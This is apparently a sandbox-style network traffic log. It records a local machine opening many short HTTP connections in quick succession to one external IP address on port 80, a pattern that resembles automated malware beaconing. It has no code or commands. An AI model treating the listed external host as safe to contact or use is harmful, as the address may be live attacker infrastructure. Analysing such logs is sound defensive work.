Jan 11, 2025 01:43:16.333803892 CET	51243	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:16.338777065 CET	80	51243	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:16.338866949 CET	51243	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:16.343672037 CET	80	51243	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:17.034079075 CET	80	51243	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:17.034110069 CET	80	51243	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:17.034255981 CET	51243	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:17.039277077 CET	80	51243	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:17.173417091 CET	51244	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:17.178421021 CET	80	51244	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:17.178513050 CET	51244	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:17.180555105 CET	51244	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:17.186446905 CET	80	51244	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:17.186517000 CET	51244	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:17.191356897 CET	80	51244	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:18.008328915 CET	80	51244	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:18.008589983 CET	80	51244	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:18.008657932 CET	51244	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:18.011478901 CET	51244	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:18.016710997 CET	80	51244	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:18.158102036 CET	51245	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:18.163446903 CET	80	51245	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:18.163516998 CET	51245	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:18.165544033 CET	51245	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:18.171401024 CET	80	51245	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:18.171448946 CET	51245	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:18.176598072 CET	80	51245	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:18.899002075 CET	80	51245	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:18.899168015 CET	80	51245	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:18.899256945 CET	51245	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:18.904264927 CET	80	51245	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:19.033597946 CET	51246	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:19.038707018 CET	80	51246	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:19.038805008 CET	51246	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:19.044585943 CET	51246	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:19.049556017 CET	80	51246	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:19.049623966 CET	51246	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:19.054461956 CET	80	51246	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:19.775940895 CET	80	51246	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:19.776020050 CET	80	51246	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:19.776145935 CET	51246	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:19.776200056 CET	51246	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:19.781039953 CET	80	51246	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:19.923502922 CET	51247	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:19.928380013 CET	80	51247	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:19.928453922 CET	51247	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:19.930483103 CET	51247	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:19.935286999 CET	80	51247	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:19.935375929 CET	51247	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:19.940236092 CET	80	51247	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:20.674877882 CET	80	51247	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:20.674901962 CET	80	51247	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:20.675014973 CET	51247	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:20.675098896 CET	51247	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:20.680254936 CET	80	51247	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:20.813604116 CET	51248	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:20.818497896 CET	80	51248	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:20.818620920 CET	51248	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:20.820662022 CET	51248	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:20.826368093 CET	80	51248	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:20.826438904 CET	51248	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:20.831357956 CET	80	51248	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:21.529187918 CET	80	51248	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:21.529284000 CET	80	51248	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:21.529416084 CET	51248	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:21.529417038 CET	51248	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:21.534310102 CET	80	51248	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:21.704718113 CET	51249	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:21.709602118 CET	80	51249	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:21.709700108 CET	51249	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:21.711738110 CET	51249	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:21.716537952 CET	80	51249	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:21.716741085 CET	51249	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:21.721554995 CET	80	51249	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:22.418973923 CET	80	51249	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:22.418997049 CET	80	51249	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:22.419116974 CET	51249	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:22.419215918 CET	51249	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:22.423959970 CET	80	51249	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:22.566278934 CET	51250	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:22.571260929 CET	80	51250	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:22.571413040 CET	51250	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:22.573429108 CET	51250	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:22.578254938 CET	80	51250	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:22.578330994 CET	51250	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:22.583345890 CET	80	51250	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:23.300400972 CET	80	51250	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:23.300434113 CET	80	51250	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:23.300653934 CET	51250	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:23.300700903 CET	51250	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:23.305529118 CET	80	51250	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:23.444539070 CET	51251	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:23.449398994 CET	80	51251	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:23.449496031 CET	51251	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:23.451675892 CET	51251	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:23.456471920 CET	80	51251	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:23.456553936 CET	51251	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:23.464571953 CET	80	51251	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:24.173432112 CET	80	51251	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:24.173494101 CET	80	51251	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:24.173563004 CET	51251	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:24.173593044 CET	51251	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:24.178410053 CET	80	51251	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:24.315042973 CET	51252	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:24.320004940 CET	80	51252	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:24.320091963 CET	51252	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:24.322185993 CET	51252	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:24.326981068 CET	80	51252	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:24.327063084 CET	51252	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:24.331840038 CET	80	51252	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:25.031737089 CET	80	51252	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:25.031788111 CET	80	51252	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:25.031982899 CET	51252	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:25.031984091 CET	51252	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:25.036923885 CET	80	51252	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:25.172837973 CET	51253	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:25.177722931 CET	80	51253	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:25.177798986 CET	51253	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:25.179891109 CET	51253	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:25.184670925 CET	80	51253	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:25.184735060 CET	51253	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:25.189470053 CET	80	51253	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:25.949522972 CET	80	51253	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:25.949681997 CET	80	51253	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:25.949805021 CET	51253	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:25.949805021 CET	51253	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:25.954696894 CET	80	51253	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:26.095149994 CET	51254	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:26.101177931 CET	80	51254	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:26.101274014 CET	51254	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:26.104372025 CET	51254	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:26.109185934 CET	80	51254	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:26.109253883 CET	51254	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:26.114928961 CET	80	51254	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:26.814487934 CET	80	51254	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:26.814574957 CET	80	51254	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:26.814641953 CET	51254	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:26.814693928 CET	51254	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:26.819521904 CET	80	51254	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:26.967027903 CET	51255	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:26.972603083 CET	80	51255	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:26.972702980 CET	51255	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:26.974829912 CET	51255	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:26.979722023 CET	80	51255	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:26.979790926 CET	51255	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:26.984718084 CET	80	51255	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:27.680749893 CET	80	51255	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:27.680807114 CET	80	51255	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:27.681022882 CET	51255	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:27.681024075 CET	51255	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:27.685956001 CET	80	51255	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:27.831183910 CET	51256	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:27.838473082 CET	80	51256	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:27.838586092 CET	51256	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:27.840715885 CET	51256	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:27.847729921 CET	80	51256	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:27.847810984 CET	51256	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:27.854754925 CET	80	51256	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:28.609339952 CET	80	51256	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:28.609402895 CET	80	51256	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:28.609487057 CET	51256	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:28.609487057 CET	51256	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:28.614504099 CET	80	51256	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:28.752226114 CET	51257	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:28.757203102 CET	80	51257	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:28.757365942 CET	51257	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:28.759398937 CET	51257	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:28.764204025 CET	80	51257	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:28.764296055 CET	51257	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:28.769081116 CET	80	51257	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:29.581001997 CET	80	51257	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:29.581110954 CET	80	51257	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:29.581279039 CET	51257	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:29.581279039 CET	51257	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:29.586148977 CET	80	51257	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:29.730201006 CET	51258	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:29.735408068 CET	80	51258	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:29.735492945 CET	51258	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:29.737620115 CET	51258	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:29.742556095 CET	80	51258	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:29.742691040 CET	51258	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:29.747517109 CET	80	51258	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:30.499888897 CET	80	51258	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:30.500053883 CET	80	51258	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:30.500137091 CET	51258	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:30.521557093 CET	51258	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:30.526590109 CET	80	51258	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:30.864847898 CET	51259	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:30.869942904 CET	80	51259	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:30.870022058 CET	51259	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:30.872328997 CET	51259	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:30.877135992 CET	80	51259	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:30.877186060 CET	51259	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:30.881923914 CET	80	51259	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:31.580795050 CET	80	51259	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:31.580853939 CET	80	51259	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:31.580940008 CET	51259	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:31.580974102 CET	51259	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:31.585802078 CET	80	51259	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:31.733042955 CET	51260	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:31.738091946 CET	80	51260	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:31.740253925 CET	51260	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:31.742301941 CET	51260	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:31.747210026 CET	80	51260	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:31.748334885 CET	51260	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:31.753231049 CET	80	51260	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:32.450759888 CET	80	51260	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:32.450788975 CET	80	51260	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:32.450948954 CET	51260	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:32.450999975 CET	51260	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:32.455881119 CET	80	51260	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:32.595693111 CET	51261	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:32.600753069 CET	80	51261	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:32.600881100 CET	51261	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:32.602880955 CET	51261	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:32.607702017 CET	80	51261	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:32.607831001 CET	51261	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:32.612696886 CET	80	51261	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:33.314687967 CET	80	51261	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:33.314769983 CET	80	51261	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:33.314838886 CET	51261	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:33.317262888 CET	51261	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:33.319695950 CET	80	51261	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:33.937273026 CET	51262	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:33.942256927 CET	80	51262	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:33.942327023 CET	51262	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:33.944672108 CET	51262	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:33.949487925 CET	80	51262	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:33.949544907 CET	51262	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:33.954420090 CET	80	51262	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:34.658876896 CET	80	51262	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:34.658945084 CET	80	51262	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:34.659023046 CET	51262	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:34.659069061 CET	51262	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:34.663944006 CET	80	51262	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:34.801991940 CET	51263	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:34.806977034 CET	80	51263	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:34.807224035 CET	51263	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:34.809350967 CET	51263	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:34.814240932 CET	80	51263	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:34.814321995 CET	51263	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:34.819145918 CET	80	51263	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:35.532752037 CET	80	51263	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:35.532816887 CET	80	51263	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:35.532933950 CET	51263	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:35.532933950 CET	51263	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:35.537890911 CET	80	51263	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:35.673520088 CET	51264	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:35.678617954 CET	80	51264	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:35.678709030 CET	51264	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:35.680735111 CET	51264	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:35.685683966 CET	80	51264	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:35.685741901 CET	51264	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:35.690593958 CET	80	51264	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:36.403749943 CET	80	51264	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:36.403855085 CET	51264	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:36.403867960 CET	80	51264	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:36.403914928 CET	51264	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:36.408746004 CET	80	51264	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:36.552546024 CET	51266	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:36.557674885 CET	80	51266	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:36.557795048 CET	51266	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:36.559978008 CET	51266	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:36.564937115 CET	80	51266	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:36.565084934 CET	51266	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:36.570076942 CET	80	51266	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:37.315417051 CET	80	51266	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:37.315452099 CET	80	51266	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:37.315629959 CET	51266	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:37.315942049 CET	51266	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:37.320816040 CET	80	51266	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:37.473575115 CET	51273	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:37.478414059 CET	80	51273	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:37.478478909 CET	51273	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:37.480484962 CET	51273	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:37.485272884 CET	80	51273	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:37.485335112 CET	51273	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:37.490165949 CET	80	51273	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:38.226561069 CET	80	51273	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:38.226742983 CET	80	51273	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:38.226839066 CET	51273	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:38.226839066 CET	51273	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:38.231837034 CET	80	51273	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:38.373934984 CET	51280	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:38.378899097 CET	80	51280	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:38.378987074 CET	51280	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:38.382016897 CET	51280	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:38.386964083 CET	80	51280	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:38.387022972 CET	51280	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:38.391858101 CET	80	51280	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:39.084547043 CET	80	51280	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:39.084652901 CET	80	51280	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:39.084673882 CET	51280	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:39.084711075 CET	51280	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:39.089520931 CET	80	51280	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:39.234045029 CET	51289	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:39.238845110 CET	80	51289	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:39.238909006 CET	51289	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:39.241821051 CET	51289	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:39.246666908 CET	80	51289	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:39.246712923 CET	51289	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:39.251492977 CET	80	51289	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:39.967514992 CET	80	51289	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:39.967572927 CET	80	51289	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:39.967690945 CET	51289	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:39.967765093 CET	51289	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:39.973809004 CET	80	51289	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:40.169639111 CET	51297	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:40.174583912 CET	80	51297	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:40.177326918 CET	51297	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:40.179362059 CET	51297	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:40.184408903 CET	80	51297	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:40.188662052 CET	51297	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:40.193545103 CET	80	51297	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:40.906372070 CET	80	51297	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:40.906466007 CET	51297	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:40.906477928 CET	80	51297	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:40.906518936 CET	51297	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:40.911220074 CET	80	51297	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:41.051333904 CET	51303	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:41.056071043 CET	80	51303	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:41.056149960 CET	51303	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:41.058645964 CET	51303	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:41.063342094 CET	80	51303	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:41.063388109 CET	51303	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:41.068120956 CET	80	51303	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:41.803119898 CET	80	51303	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:41.803149939 CET	80	51303	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:41.803250074 CET	51303	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:41.803303003 CET	51303	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:41.808125973 CET	80	51303	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:42.023885012 CET	51309	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:42.029150963 CET	80	51309	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:42.029244900 CET	51309	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:42.031352043 CET	51309	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:42.036637068 CET	80	51309	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:42.036689997 CET	51309	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:42.043360949 CET	80	51309	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:42.794162035 CET	80	51309	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:42.794250011 CET	51309	80	192.168.2.8	94.156.177.41
